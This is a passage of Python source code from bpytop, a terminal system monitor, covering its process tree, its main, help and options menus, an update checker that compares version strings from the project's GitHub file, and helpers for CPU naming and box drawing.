if search: collapse = False elif collapse and not collapse_to: collapse_to = pid if pid not in tree: return children = tree[pid][:-1] for child in children: create_tree(child, tree, indent + " │ ", indent + " ├─ ", found=found, depth=depth+1, collapse_to=collapse_to) create_tree(tree[pid][-1], tree, indent + " ", indent + " └─ ", depth=depth+1, collapse_to=collapse_to) create_tree(min(tree), tree) cls.det_cpu = det_cpu if cls.collect_interrupt: return if cls.tree_counter >= 100: cls.tree_counter = 0 for pid in list(cls.collapsed): if not psutil.pid_exists(pid): del cls.collapsed[pid] cls.num_procs = len(out) cls.processes = out.copy() @classmethod def sorting(cls, key: str): index: int = CONFIG.sorting_options.index(CONFIG.proc_sorting) + (1 if key == "right" else -1) if index >= len(CONFIG.sorting_options): index = 0 elif index < 0: index = len(CONFIG.sorting_options) - 1 CONFIG.proc_sorting = CONFIG.sorting_options[index] if "left" in Key.mouse: del Key.mouse["left"] Collector.collect(ProcCollector, interrupt=True, redraw=True) @classmethod def _draw(cls): ProcBox._draw_fg() class Menu: '''Holds all menus''' active: bool = False close: bool = False resized: bool = True menus: Dict[str, Dict[str, str]] = {} menu_length: Dict[str, int] = {} background: str = "" for name, menu in MENUS.items(): menu_length[name] = len(menu["normal"][0]) menus[name] = {} for sel in ["normal", "selected"]: menus[name][sel] = "" for i in range(len(menu[sel])): menus[name][sel] += Fx.trans(f'{Color.fg(MENU_COLORS[sel][i])}{menu[sel][i]}') if i < len(menu[sel]) - 1: menus[name][sel] += f'{Mv.d(1)}{Mv.l(len(menu[sel][i]))}' @classmethod def main(cls): out: str = "" banner: str = "" redraw: bool = True key: str = "" mx: int = 0 my: int = 0 skip: bool = False mouse_over: bool = False mouse_items: Dict[str, Dict[str, int]] = {} cls.active = True cls.resized = True menu_names: List[str] = list(cls.menus.keys()) menu_index: int = 0 menu_current: str = menu_names[0] cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}' while not cls.close: key = "" if cls.resized: banner = (f'{Banner.draw(Term.height // 2 - 10, center=True)}{Mv.d(1)}{Mv.l(46)}{Colors.black_bg}{Colors.default}{Fx.b}← esc' f'{Mv.r(30)}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}') if UpdateChecker.version != VERSION: banner += f'{Mv.to(Term.height, 1)}{Fx.b}{THEME.title}New release {UpdateChecker.version} available at https://github.com/aristocratos/bpytop{Fx.ub}{Term.fg}' cy = 0 for name, menu in cls.menus.items(): ypos = Term.height // 2 - 2 + cy xpos = Term.width // 2 - (cls.menu_length[name] // 2) mouse_items[name] = { "x1" : xpos, "x2" : xpos + cls.menu_length[name] - 1, "y1" : ypos, "y2" : ypos + 2 } cy += 3 redraw = True cls.resized = False if redraw: out = "" for name, menu in cls.menus.items(): out += f'{Mv.to(mouse_items[name]["y1"], mouse_items[name]["x1"])}{menu["selected" if name == menu_current else "normal"]}' if skip and redraw: Draw.now(out) elif not skip: Draw.now(f'{cls.background}{banner}{out}') skip = redraw = False if Key.input_wait(Timer.left(), mouse=True): if Key.mouse_moved(): mx, my = Key.get_mouse() for name, pos in mouse_items.items(): if pos["x1"] <= mx <= pos["x2"] and pos["y1"] <= my <= pos["y2"]: mouse_over = True if name != menu_current: menu_current = name menu_index = menu_names.index(name) redraw = True break else: mouse_over = False else: key = Key.get() if key == "mouse_click" and not mouse_over: key = "M" if key == "q": clean_quit() elif key in ["escape", "M"]: cls.close = True break elif key in ["up", "mouse_scroll_up", "shift_tab"]: menu_index -= 1 if menu_index < 0: menu_index = len(menu_names) - 1 menu_current = menu_names[menu_index] redraw = True elif key in ["down", "mouse_scroll_down", "tab"]: menu_index += 1 if menu_index > len(menu_names) - 1: menu_index = 0 menu_current = menu_names[menu_index] redraw = True elif key == "enter" or (key == "mouse_click" and mouse_over): if menu_current == "quit": clean_quit() elif menu_current == "options": cls.options() cls.resized = True elif menu_current == "help": cls.help() cls.resized = True if Timer.not_zero() and not cls.resized: skip = True else: Collector.collect() Collector.collect_done.wait(2) if CONFIG.background_update: cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}' Timer.stamp() Draw.now(f'{Draw.saved_buffer()}') cls.background = "" cls.active = False cls.close = False @classmethod def help(cls): out: str = "" out_misc : str = "" redraw: bool = True key: str = "" skip: bool = False main_active: bool = cls.active cls.active = True cls.resized = True if not cls.background: cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}' help_items: Dict[str, str] = { "(Mouse 1)" : "Clicks buttons and selects in process list.", "Selected (Mouse 1)" : "Show detailed information for selected process.", "(Mouse scroll)" : "Scrolls any scrollable list/text under cursor.", "(Esc, shift+m)" : "Toggles main menu.", "(m)" : "Change current view mode, order full->proc->stat.", "(F2, o)" : "Shows options.", "(F1, h)" : "Shows this window.", "(ctrl+z)" : "Sleep program and put in background.", "(ctrl+c, q)" : "Quits program.", "(+) / (-)" : "Add/Subtract 100ms to/from update timer.", "(Up) (Down)" : "Select in process list.", "(Enter)" : "Show detailed information for selected process.", "(Spacebar)" : "Expand/collapse the selected process in tree view.", "(Pg Up) (Pg Down)" : "Jump 1 page in process list.", "(Home) (End)" : "Jump to first or last page in process list.", "(Left) (Right)" : "Select previous/next sorting column.", "(b) (n)" : "Select previous/next network device.", "(z)" : "Toggle totals reset for current network device", "(a)" : "Toggle auto scaling for the network graphs.", "(y)" : "Toggle synced scaling mode for network graphs.", "(f)" : "Input a string to filter processes with.", "(c)" : "Toggle per-core cpu usage of processes.", "(r)" : "Reverse sorting order in processes box.", "(e)" : "Toggle processes tree view.", "(delete)" : "Clear any entered filter.", "Selected (T, t)" : "Terminate selected process with SIGTERM - 15.", "Selected (K, k)" : "Kill selected process with SIGKILL - 9.", "Selected (I, i)" : "Interrupt selected process with SIGINT - 2.", "_1" : " ", "_2" : "For bug reporting and project updates, visit:", "_3" : "https://github.com/aristocratos/bpytop", } while not cls.close: key = "" if cls.resized: y = 8 if Term.height < len(help_items) + 10 else Term.height // 2 - len(help_items) // 2 + 4 out_misc = (f'{Banner.draw(y-7, center=True)}{Mv.d(1)}{Mv.l(46)}{Colors.black_bg}{Colors.default}{Fx.b}← esc' f'{Mv.r(30)}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}') x = Term.width//2-36 h, w = Term.height-2-y, 72 if len(help_items) > h: pages = ceil(len(help_items) / h) else: h = len(help_items) pages = 0 page = 1 out_misc += create_box(x, y, w, h+3, "help", line_color=THEME.div_line) redraw = True cls.resized = False if redraw: out = "" cy = 0 if pages: out += (f'{Mv.to(y, x+56)}{THEME.div_line(Symbol.title_left)}{Fx.b}{THEME.title("pg")}{Fx.ub}{THEME.main_fg(Symbol.up)} {Fx.b}{THEME.title}{page}/{pages} ' f'pg{Fx.ub}{THEME.main_fg(Symbol.down)}{THEME.div_line(Symbol.title_right)}') out += f'{Mv.to(y+1, x+1)}{THEME.title}{Fx.b}{"Keys:":^20}Description:{THEME.main_fg}' for n, (keys, desc) in enumerate(help_items.items()): if pages and n < (page - 1) * h: continue out += f'{Mv.to(y+2+cy, x+1)}{Fx.b}{("" if keys.startswith("_") else keys):^20.20}{Fx.ub}{desc:50.50}' cy += 1 if cy == h: break if cy < h: for i in range(h-cy): out += f'{Mv.to(y+2+cy+i, x+1)}{" " * (w-2)}' if skip and redraw: Draw.now(out) elif not skip: Draw.now(f'{cls.background}{out_misc}{out}') skip = redraw = False if Key.input_wait(Timer.left()): key = Key.get() if key == "mouse_click": mx, my = Key.get_mouse() if x <= mx < x + w and y <= my < y + h + 3: if pages and my == y and x + 56 < mx < x + 61: key = "up" elif pages and my == y and x + 63 < mx < x + 68: key = "down" else: key = "escape" if key == "q": clean_quit() elif key in ["escape", "M", "enter", "backspace", "h", "f1"]: cls.close = True break elif key in ["up", "mouse_scroll_up", "page_up"] and pages: page -= 1 if page < 1: page = pages redraw = True elif key in ["down", "mouse_scroll_down", "page_down"] and pages: page += 1 if page > pages: page = 1 redraw = True if Timer.not_zero() and not cls.resized: skip = True else: Collector.collect() Collector.collect_done.wait(2) if CONFIG.background_update: cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}' Timer.stamp() if main_active: cls.close = False return Draw.now(f'{Draw.saved_buffer()}') cls.background = "" cls.active = False cls.close = False @classmethod def options(cls): out: str = "" out_misc : str = "" redraw: bool = True key: str = "" skip: bool = False main_active: bool = cls.active cls.active = True cls.resized = True d_quote: str inputting: bool = False input_val: str = "" global ARG_MODE Theme.refresh() if not cls.background: cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}' option_items: Dict[str, List[str]] = { "color_theme" : [ 'Set color theme.', '', 'Choose from all theme files in', '"/usr/[local/]share/bpytop/themes" and', '"~/.config/bpytop/themes".', '', '"Default" for builtin default theme.', 'User themes are prefixed by a plus sign "+".', '', 'For theme updates see:', 'https://github.com/aristocratos/bpytop'], "theme_background" : [ 'If the theme set background should be shown.', '', 'Set to False if you want terminal background', 'transparency.'], "view_mode" : [ 'Set bpytop view mode.', '', '"full" for everything shown.', '"proc" for cpu stats and processes.', '"stat" for cpu, mem, disks and net stats shown.'], "update_ms" : [ 'Update time in milliseconds.', '', 'Recommended 2000 ms or above for better sample', 'times for graphs.', '', 'Min value: 100 ms', 'Max value: 86400000 ms = 24 hours.'], "proc_sorting" : [ 'Processes sorting option.', '', 'Possible values: "pid", "program", "arguments",', '"threads", "user", "memory", "cpu lazy" and', '"cpu responsive".', '', '"cpu lazy" updates top process over time,', '"cpu responsive" updates top process directly.'], "proc_reversed" : [ 'Reverse processes sorting order.', '', 'True or False.'], "proc_tree" : [ 'Processes tree view.', '', 'Set true to show processes grouped by parents,', 'with lines drawn between parent and child', 'process.'], "tree_depth" : [ 'Process tree auto collapse depth.', '', 'Sets the depth were the tree view will auto', 'collapse processes at.'], "proc_colors" : [ 'Enable colors in process view.', '', 'Uses the cpu graph gradient colors.'], "proc_gradient" : [ 'Enable process view gradient fade.', '', 'Fades from top or current selection.', 'Max fade value is equal to current themes', '"inactive_fg" color value.'], "proc_per_core" : [ 'Process usage per core.', '', 'If process cpu usage should be of the core', 'it\'s running on or usage of the total', 'available cpu power.', '', 'If true and process is multithreaded', 'cpu usage can reach over 100%.'], "proc_mem_bytes" : [ 'Show memory as bytes in process list.', ' ', 'True or False.' ], "check_temp" : [ 'Enable cpu temperature reporting.', '', 'True or False.'], "cpu_sensor" : [ 'Cpu temperature sensor', '', 'Select the sensor that corresponds to', 'your cpu temperature.', 'Set to "Auto" for auto detection.'], "show_coretemp" : [ 'Show temperatures for cpu cores.', '', 'Only works if check_temp is True and', 'the system is reporting core temps.'], "draw_clock" : [ 'Draw a clock at top of screen.', '', 'Formatting according to strftime, empty', 'string to disable.', '', 'Custom formatting options:', '"/host" = hostname', '"/user" = username', '', 'Examples of strftime formats:', '"%X" = locale HH:MM:SS', '"%H" = 24h hour, "%I" = 12h hour', '"%M" = minute, "%S" = second', '"%d" = day, "%m" = month, "%y" = year'], "background_update" : [ 'Update main ui when menus are showing.', '', 'True or False.', '', 'Set this to false if the menus is flickering', 'too much for a comfortable experience.'], "custom_cpu_name" : [ 'Custom cpu model name in cpu percentage box.', '', 'Empty string to disable.'], "disks_filter" : [ 'Optional filter for shown disks.', '', 'Should be full path of a mountpoint,', '"root" replaces "/", separate multiple values', 'with a comma ",".', 'Begin line with "exclude=" to change to exclude', 'filter.', 'Oterwise defaults to "most include" filter.', '', 'Example: disks_filter="exclude=/boot, /home/user"'], "mem_graphs" : [ 'Show graphs for memory values.', '', 'True or False.'], "show_swap" : [ 'If swap memory should be shown in memory box.', '', 'True or False.'], "swap_disk" : [ 'Show swap as a disk.', '', 'Ignores show_swap value above.', 'Inserts itself after first disk.'], "show_disks" : [ 'Split memory box to also show disks.', '', 'True or False.'], "net_download" : [ 'Fixed network graph download value.', '', 'Default "10M" = 10 MibiBytes.', 'Possible units:', '"K" (KiB), "M" (MiB), "G" (GiB).', '', 'Append "bit" for bits instead of bytes,', 'i.e "100Mbit"', '', 'Can be toggled with auto button.'], "net_upload" : [ 'Fixed network graph upload value.', '', 'Default "10M" = 10 MibiBytes.', 'Possible units:', '"K" (KiB), "M" (MiB), "G" (GiB).', '', 'Append "bit" for bits instead of bytes,', 'i.e "100Mbit"', '', 'Can be toggled with auto button.'], "net_auto" : [ 'Start in network graphs auto rescaling mode.', '', 'Ignores any values set above at start and', 'rescales down to 10KibiBytes at the lowest.', '', 'True or False.'], "net_sync" : [ 'Network scale sync.', '', 'Syncs the scaling for download and upload to', 'whichever currently has the highest scale.', '', 'True or False.'], "net_color_fixed" : [ 'Set network graphs color gradient to fixed.', '', 'If True the network graphs color is based', 'on the total bandwidth usage instead of', 'the current autoscaling.', '', 'The bandwidth usage is based on the', '"net_download" and "net_upload" values set', 'above.'], "show_battery" : [ 'Show battery stats.', '', 'Show battery stats in the top right corner', 'if a battery is present.'], "show_init" : [ 'Show init screen at startup.', '', 'The init screen is purely cosmetical and', 'slows down start to show status messages.'], "update_check" : [ 'Check for updates at start.', '', 'Checks for latest version from:', 'https://github.com/aristocratos/bpytop'], "log_level" : [ 'Set loglevel for error.log', '', 'Levels are: "ERROR" "WARNING" "INFO" "DEBUG".', 'The level set includes all lower levels,', 'i.e. "DEBUG" will show all logging info.'] } option_len: int = len(option_items) * 2 sorting_i: int = CONFIG.sorting_options.index(CONFIG.proc_sorting) loglevel_i: int = CONFIG.log_levels.index(CONFIG.log_level) view_mode_i: int = CONFIG.view_modes.index(CONFIG.view_mode) cpu_sensor_i: int = CONFIG.cpu_sensors.index(CONFIG.cpu_sensor) color_i: int while not cls.close: key = "" if cls.resized: y = 9 if Term.height < option_len + 10 else Term.height // 2 - option_len // 2 + 4 out_misc = (f'{Banner.draw(y-7, center=True)}{Mv.d(1)}{Mv.l(46)}{Colors.black_bg}{Colors.default}{Fx.b}← esc' f'{Mv.r(30)}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}') x = Term.width//2-38 x2 = x + 27 h, w, w2 = Term.height-2-y, 26, 50 h -= h % 2 color_i = list(Theme.themes).index(THEME.current) if option_len > h: pages = ceil(option_len / h) else: h = option_len pages = 0 page = 1 selected_int = 0 out_misc += create_box(x, y, w, h+2, "options", line_color=THEME.div_line) redraw = True cls.resized = False if redraw: out = "" cy = 0 selected = list(option_items)[selected_int] if pages: out += (f'{Mv.to(y+h+1, x+11)}{THEME.div_line(Symbol.title_left)}{Fx.b}{THEME.title("pg")}{Fx.ub}{THEME.main_fg(Symbol.up)} {Fx.b}{THEME.title}{page}/{pages} ' f'pg{Fx.ub}{THEME.main_fg(Symbol.down)}{THEME.div_line(Symbol.title_right)}') #out += f'{Mv.to(y+1, x+1)}{THEME.title}{Fx.b}{"Keys:":^20}Description:{THEME.main_fg}' for n, opt in enumerate(option_items): if pages and n < (page - 1) * ceil(h / 2): continue value = getattr(CONFIG, opt) t_color = f'{THEME.selected_bg}{THEME.selected_fg}' if opt == selected else f'{THEME.title}' v_color = "" if opt == selected else f'{THEME.title}' d_quote = '"' if isinstance(value, str) else "" if opt == "color_theme": counter = f' {color_i + 1}/{len(Theme.themes)}' elif opt == "proc_sorting": counter = f' {sorting_i + 1}/{len(CONFIG.sorting_options)}' elif opt == "log_level": counter = f' {loglevel_i + 1}/{len(CONFIG.log_levels)}' elif opt == "view_mode": counter = f' {view_mode_i + 1}/{len(CONFIG.view_modes)}' elif opt == "cpu_sensor": counter = f' {cpu_sensor_i + 1}/{len(CONFIG.cpu_sensors)}' else: counter = "" out += f'{Mv.to(y+1+cy, x+1)}{t_color}{Fx.b}{opt.replace("_", " ").capitalize() + counter:^24.24}{Fx.ub}{Mv.to(y+2+cy, x+1)}{v_color}' if opt == selected: if isinstance(value, bool) or opt in ["color_theme", "proc_sorting", "log_level", "view_mode", "cpu_sensor"]: out += f'{t_color} {Symbol.left}{v_color}{d_quote + str(value) + d_quote:^20.20}{t_color}{Symbol.right} ' elif inputting: out += f'{str(input_val)[-17:] + Fx.bl + "█" + Fx.ubl + "" + Symbol.enter:^33.33}' else: out += ((f'{t_color} {Symbol.left}{v_color}' if type(value) is int else " ") + f'{str(value) + " " + Symbol.enter:^20.20}' + (f'{t_color}{Symbol.right} ' if type(value) is int else " ")) else: out += f'{d_quote + str(value) + d_quote:^24.24}' out += f'{Term.bg}' if opt == selected: h2 = len(option_items[opt]) + 2 y2 = y + (selected_int * 2) - ((page-1) * h) if y2 + h2 > Term.height: y2 = Term.height - h2 out += f'{create_box(x2, y2, w2, h2, "description", line_color=THEME.div_line)}{THEME.main_fg}' for n, desc in enumerate(option_items[opt]): out += f'{Mv.to(y2+1+n, x2+2)}{desc:.48}' cy += 2 if cy >= h: break if cy < h: for i in range(h-cy): out += f'{Mv.to(y+1+cy+i, x+1)}{" " * (w-2)}' if not skip or redraw: Draw.now(f'{cls.background}{out_misc}{out}') skip = redraw = False if Key.input_wait(Timer.left()): key = Key.get() redraw = True has_sel = False if key == "mouse_click" and not inputting: mx, my = Key.get_mouse() if x < mx < x + w and y < my < y + h + 2: mouse_sel = ceil((my - y) / 2) - 1 + ceil((page-1) * (h / 2)) if pages and my == y+h+1 and x+11 < mx < x+16: key = "page_up" elif pages and my == y+h+1 and x+19 < mx < x+24: key = "page_down" elif my == y+h+1: pass elif mouse_sel == selected_int: if mx < x + 6: key = "left" elif mx > x + 19: key = "right" else: key = "enter" elif mouse_sel < len(option_items): selected_int = mouse_sel has_sel = True else: key = "escape" if inputting: if key in ["escape", "mouse_click"]: inputting = False elif key == "enter": inputting = False if str(getattr(CONFIG, selected)) != input_val: if selected == "update_ms": if not input_val or int(input_val) < 100: CONFIG.update_ms = 100 elif int(input_val) > 86399900: CONFIG.update_ms = 86399900 else: CONFIG.update_ms = int(input_val) elif selected == "tree_depth": if not input_val or int(input_val) < 0: CONFIG.tree_depth = 0 else: CONFIG.tree_depth = int(input_val) ProcCollector.collapsed = {} elif isinstance(getattr(CONFIG, selected), str): setattr(CONFIG, selected, input_val) if selected.startswith("net_"): NetCollector.net_min = {"download" : -1, "upload" : -1} elif selected == "draw_clock": Box.clock_on = len(CONFIG.draw_clock) > 0 if not Box.clock_on: Draw.clear("clock", saved=True) Term.refresh(force=True) cls.resized = False elif key == "backspace" and len(input_val): input_val = input_val[:-1] elif key == "delete": input_val = "" elif isinstance(getattr(CONFIG, selected), str) and len(key) == 1: input_val += key elif isinstance(getattr(CONFIG, selected), int) and key.isdigit(): input_val += key elif key == "q": clean_quit() elif key in ["escape", "o", "M", "f2"]: cls.close = True break elif key == "enter" and selected in ["update_ms", "disks_filter", "custom_cpu_name", "net_download", "net_upload", "draw_clock", "tree_depth"]: inputting = True input_val = str(getattr(CONFIG, selected)) elif key == "left" and selected == "update_ms" and CONFIG.update_ms - 100 >= 100: CONFIG.update_ms -= 100 Box.draw_update_ms() elif key == "right" and selected == "update_ms" and CONFIG.update_ms + 100 <= 86399900: CONFIG.update_ms += 100 Box.draw_update_ms() elif key == "left" and selected == "tree_depth" and CONFIG.tree_depth > 0: CONFIG.tree_depth -= 1 ProcCollector.collapsed = {} elif key == "right" and selected == "tree_depth": CONFIG.tree_depth += 1 ProcCollector.collapsed = {} elif key in ["left", "right"] and isinstance(getattr(CONFIG, selected), bool): setattr(CONFIG, selected, not getattr(CONFIG, selected)) if selected == "check_temp": if CONFIG.check_temp: CpuCollector.get_sensors() else: CpuCollector.sensor_method = "" CpuCollector.got_sensors = False if selected in ["net_auto", "net_color_fixed", "net_sync"]: if selected == "net_auto": NetCollector.auto_min = CONFIG.net_auto NetBox.redraw = True if selected == "theme_background": Term.bg = f'{THEME.main_bg}' if CONFIG.theme_background else "\033[49m" Draw.now(Term.bg) if selected == "show_battery": Draw.clear("battery", saved=True) Term.refresh(force=True) cls.resized = False elif key in ["left", "right"] and selected == "color_theme" and len(Theme.themes) > 1: if key == "left": color_i -= 1 if color_i < 0: color_i = len(Theme.themes) - 1 elif key == "right": color_i += 1 if color_i > len(Theme.themes) - 1: color_i = 0 Collector.collect_idle.wait() CONFIG.color_theme = list(Theme.themes)[color_i] THEME(CONFIG.color_theme) Term.refresh(force=True) Timer.finish() elif key in ["left", "right"] and selected == "proc_sorting": ProcCollector.sorting(key) elif key in ["left", "right"] and selected == "log_level": if key == "left": loglevel_i -= 1 if loglevel_i < 0: loglevel_i = len(CONFIG.log_levels) - 1 elif key == "right": loglevel_i += 1 if loglevel_i > len(CONFIG.log_levels) - 1: loglevel_i = 0 CONFIG.log_level = CONFIG.log_levels[loglevel_i] errlog.setLevel(getattr(logging, CONFIG.log_level)) errlog.info(f'Loglevel set to {CONFIG.log_level}') elif key in ["left", "right"] and selected == "cpu_sensor" and len(CONFIG.cpu_sensors) > 1: if key == "left": cpu_sensor_i -= 1 if cpu_sensor_i < 0: cpu_sensor_i = len(CONFIG.cpu_sensors) - 1 elif key == "right": cpu_sensor_i += 1 if cpu_sensor_i > len(CONFIG.cpu_sensors) - 1: cpu_sensor_i = 0 Collector.collect_idle.wait() CpuCollector.sensor_swap = True CONFIG.cpu_sensor = CONFIG.cpu_sensors[cpu_sensor_i] if CONFIG.check_temp and (CpuCollector.sensor_method != "psutil" or CONFIG.cpu_sensor == "Auto"): CpuCollector.get_sensors() Term.refresh(force=True) cls.resized = False elif key in ["left", "right"] and selected == "view_mode": if key == "left": view_mode_i -= 1 if view_mode_i < 0: view_mode_i = len(CONFIG.view_modes) - 1 elif key == "right": view_mode_i += 1 if view_mode_i > len(CONFIG.view_modes) - 1: view_mode_i = 0 CONFIG.view_mode = CONFIG.view_modes[view_mode_i] Box.proc_mode = CONFIG.view_mode == "proc" Box.stat_mode = CONFIG.view_mode == "stat" if ARG_MODE: ARG_MODE = "" Draw.clear(saved=True) Term.refresh(force=True) cls.resized = False elif key == "up": selected_int -= 1 if selected_int < 0: selected_int = len(option_items) - 1 page = floor(selected_int * 2 / h) + 1 elif key == "down": selected_int += 1 if selected_int > len(option_items) - 1: selected_int = 0 page = floor(selected_int * 2 / h) + 1 elif key in ["mouse_scroll_up", "page_up"] and pages: page -= 1 if page < 1: page = pages selected_int = (page-1) * ceil(h / 2) elif key in ["mouse_scroll_down", "page_down"] and pages: page += 1 if page > pages: page = 1 selected_int = (page-1) * ceil(h / 2) elif has_sel: pass else: redraw = False if Timer.not_zero() and not cls.resized: skip = True else: Collector.collect() Collector.collect_done.wait(2) if CONFIG.background_update: cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}' Timer.stamp() if main_active: cls.close = False return Draw.now(f'{Draw.saved_buffer()}') cls.background = "" cls.active = False cls.close = False class Timer: timestamp: float return_zero = False @classmethod def stamp(cls): cls.timestamp = time() @classmethod def not_zero(cls) -> bool: if cls.return_zero: cls.return_zero = False return False return cls.timestamp + (CONFIG.update_ms / 1000) > time() @classmethod def left(cls) -> float: return cls.timestamp + (CONFIG.update_ms / 1000) - time() @classmethod def finish(cls): cls.return_zero = True cls.timestamp = time() - (CONFIG.update_ms / 1000) Key.break_wait() class UpdateChecker: version: str = VERSION thread: threading.Thread @classmethod def run(cls): cls.thread = threading.Thread(target=cls._checker) cls.thread.start() @classmethod def _checker(cls): try: with urllib.request.urlopen("https://github.com/aristocratos/bpytop/raw/master/bpytop.py", timeout=5) as source: # type: ignore for line in source: line = line.decode("utf-8") if line.startswith("VERSION: str ="): cls.version = line[(line.index("=")+1):].strip('" \n') break except Exception as e: errlog.exception(f'{e}') else: if cls.version != VERSION and which("notify-send"): try: subprocess.run(["notify-send", "-u", "normal", "BpyTop Update!", f'New version of BpyTop available!\nCurrent version: {VERSION}\nNew version: {cls.version}\nDownload at github.com/aristocratos/bpytop', "-i", "update-notifier", "-t", "10000"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) except Exception as e: errlog.exception(f'{e}') class Init: running: bool = True initbg_colors: List[str] = [] initbg_data: List[int] initbg_up: Graph initbg_down: Graph resized = False @classmethod def start(cls): Draw.buffer("init", z=1) Draw.buffer("initbg", z=10) for i in range(51): for _ in range(2): cls.initbg_colors.append(Color.fg(i, i, i)) Draw.buffer("banner", (f'{Banner.draw(Term.height // 2 - 10, center=True)}{Mv.d(1)}{Mv.l(11)}{Colors.black_bg}{Colors.default}' f'{Fx.b}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}{Color.fg("#50")}'), z=2) for _i in range(7): perc = f'{str(round((_i + 1) * 14 + 2)) + "%":>5}' Draw.buffer("+banner", f'{Mv.to(Term.height // 2 - 2 + _i, Term.width // 2 - 28)}{Fx.trans(perc)}{Symbol.v_line}') Draw.out("banner") Draw.buffer("+init!", f'{Color.fg("#cc")}{Fx.b}{Mv.to(Term.height // 2 - 2, Term.width // 2 - 21)}{Mv.save}') cls.initbg_data = [randint(0, 100) for _ in range(Term.width * 2)] cls.initbg_up = Graph(Term.width, Term.height // 2, cls.initbg_colors, cls.initbg_data, invert=True) cls.initbg_down = Graph(Term.width, Term.height // 2, cls.initbg_colors, cls.initbg_data, invert=False) @classmethod def success(cls): if not CONFIG.show_init or cls.resized: return cls.draw_bg(5) Draw.buffer("+init!", f'{Mv.restore}{Symbol.ok}\n{Mv.r(Term.width // 2 - 22)}{Mv.save}') @staticmethod def fail(err): if CONFIG.show_init: Draw.buffer("+init!", f'{Mv.restore}{Symbol.fail}') sleep(2) errlog.exception(f'{err}') clean_quit(1, errmsg=f'Error during init! See {CONFIG_DIR}/error.log for more information.') @classmethod def draw_bg(cls, times: int = 5): for _ in range(times): sleep(0.05) x = randint(0, 100) Draw.buffer("initbg", f'{Fx.ub}{Mv.to(0, 0)}{cls.initbg_up(x)}{Mv.to(Term.height // 2, 0)}{cls.initbg_down(x)}') Draw.out("initbg", "banner", "init") @classmethod def done(cls): cls.running = False if not CONFIG.show_init: return if cls.resized: Draw.now(Term.clear) else: cls.draw_bg(10) Draw.clear("initbg", "banner", "init", saved=True) if cls.resized: return del cls.initbg_up, cls.initbg_down, cls.initbg_data, cls.initbg_colors #? Functions -------------------------------------------------------------------------------------> def get_cpu_name() -> str: '''Fetch a suitable CPU identifier from the CPU model name string''' name: str = "" nlist: List = [] command: str = "" cmd_out: str = "" rem_line: str = "" if SYSTEM == "Linux": command = "cat /proc/cpuinfo" rem_line = "model name" elif SYSTEM == "MacOS": command ="sysctl -n machdep.cpu.brand_string" elif SYSTEM == "BSD": command ="sysctl hw.model" rem_line = "hw.model" try: cmd_out = subprocess.check_output("LANG=C " + command, shell=True, universal_newlines=True) except: pass if rem_line: for line in cmd_out.split("\n"): if rem_line in line: name = re.sub( ".*" + rem_line + ".*:", "", line,1).lstrip() else: name = cmd_out nlist = name.split(" ") try: if "Xeon" in name and "CPU" in name: name = nlist[nlist.index("CPU")+(-1 if name.endswith(("CPU", "z")) else 1)] elif "Ryzen" in name: name = " ".join(nlist[nlist.index("Ryzen"):nlist.index("Ryzen")+3]) elif "Duo" in name and "@" in name: name = " ".join(nlist[:nlist.index("@")]) elif "CPU" in name and not nlist[0] == "CPU" and not nlist[nlist.index("CPU")-1].isdigit(): name = nlist[nlist.index("CPU")-1] except: pass name = name.replace("Processor", "").replace("CPU", "").replace("(R)", "").replace("(TM)", "").replace("Intel", "") name = re.sub(r"\d?\.?\d+[mMgG][hH][zZ]", "", name) name = " ".join(name.split()) return name def get_cpu_core_mapping() -> List[int]: mapping: List[int] = [] if SYSTEM == "Linux" and os.path.isfile("/proc/cpuinfo"): try: mapping = [0] * THREADS num = 0 with open("/proc/cpuinfo", "r") as f: for line in f: if line.startswith("processor"): num = int(line.strip()[(line.index(": ")+2):]) if num > THREADS - 1: break elif line.startswith("core id"): mapping[num] = int(line.strip()[(line.index(": ")+2):]) if num < THREADS - 1: raise Exception except: mapping = [] if not mapping: mapping = [] for _ in range(THREADS // CORES): mapping.extend([x for x in range(CORES)]) return mapping def create_box(x: int = 0, y: int = 0, width: int = 0, height: int = 0, title: str = "", title2: str = "", line_color: Color = None, title_color: Color = None, fill: bool = True, box = None) -> str: '''Create a box from a box object or by given arguments''' out: str = f'{Term.fg}{Term.bg}' if not line_color: line_color = THEME.div_line if not title_color: title_color = THEME.title #* Get values from box class if given if box: x = box.x y = box.y width = box.width height =box.height title = box.name hlines: Tuple[int, int] = (y, y + height - 1) out += f'{line_color}' #* Draw all horizontal lines for hpos in hlines: out += f'{Mv.to(hpos, x)}{Symbol.h_line * (width - 1)}' #* Draw all vertical lines and fill if enabled for hpos in range(hlines[0]+1, hlines[1]): out += f'{Mv.to(hpos, x)}{Symbol.v_line}{" " * (width-2) if fill else Mv.r(width-2)}{Symbol.v_line}' #* Draw corners out += f'{Mv.to(y, x)}{Symbol.left_up}\ {Mv.to(y, x + width - 1)}{Symbol.right_up}\ {Mv.to(y + height - 1, x)}{Symbol.left_down}\ {Mv.to(y + height - 1, x + width - 1)}{Symbol.right_down}' #* Draw titles if enabled if title: out += f'{Mv.to(y, x + 2)}{Symbol.title_left}{title_color}{Fx.b}{title}{Fx.ub}{line_color}{Symbol.title_right}' if title2: out += f'{Mv.to(hlines[1], x + 2)}{Symbol.title_left}{title_color}{Fx.b}{title2}{Fx.ub}{line_color}{Symbol.title_right}' return f'{out}{Term.fg}{Mv.to(y + 1, x + 1)}' def now_sleeping(signum, frame): """Reset terminal settings and stop background input read before putting to sleep""" Key.stop() Collector.stop() Draw.now(Term.clear, Term.normal_screen, Term.show_cursor, Term.mouse_off, Term.mouse_direct_off, Term.title()) Term.echo(True) os.kill(os.getpid(), 